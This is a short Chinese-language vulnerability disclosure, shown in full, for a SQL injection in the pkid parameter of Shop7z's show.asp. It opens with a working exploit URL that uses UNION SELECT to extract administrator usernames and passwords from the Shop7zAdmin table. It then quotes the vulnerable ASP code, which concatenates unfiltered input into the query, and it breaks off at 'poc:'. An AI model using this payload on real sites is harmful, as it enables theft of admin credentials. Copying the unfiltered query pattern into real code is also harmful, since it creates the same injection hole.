Shop7z /show.asp pkid参数SQL注入漏洞

exp：show.asp?pkid=4820%20and%201%20=%202%20union%20select%201,2,3,4,5,6,7,suser,9,10,11,12,13,14,15,16,spwd,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42%20from%20Shop7zAdmin...

Shop7z /show.asp pkid参数SQL注入漏洞

漏洞出现在show.asp 358行开始 dim pkid,model,productname,smallpicpath,price1,price2,pipai pkid=request"pkid" sql="select from viewproduct where pkid = "&pkid set rs=server.createobject"adodb.recordset" rs.open sql,conn,1,1 if rs.bof or rs.eof then pkid直接通过request获取 并拼接到sql语句中 没有任何过滤 poc:...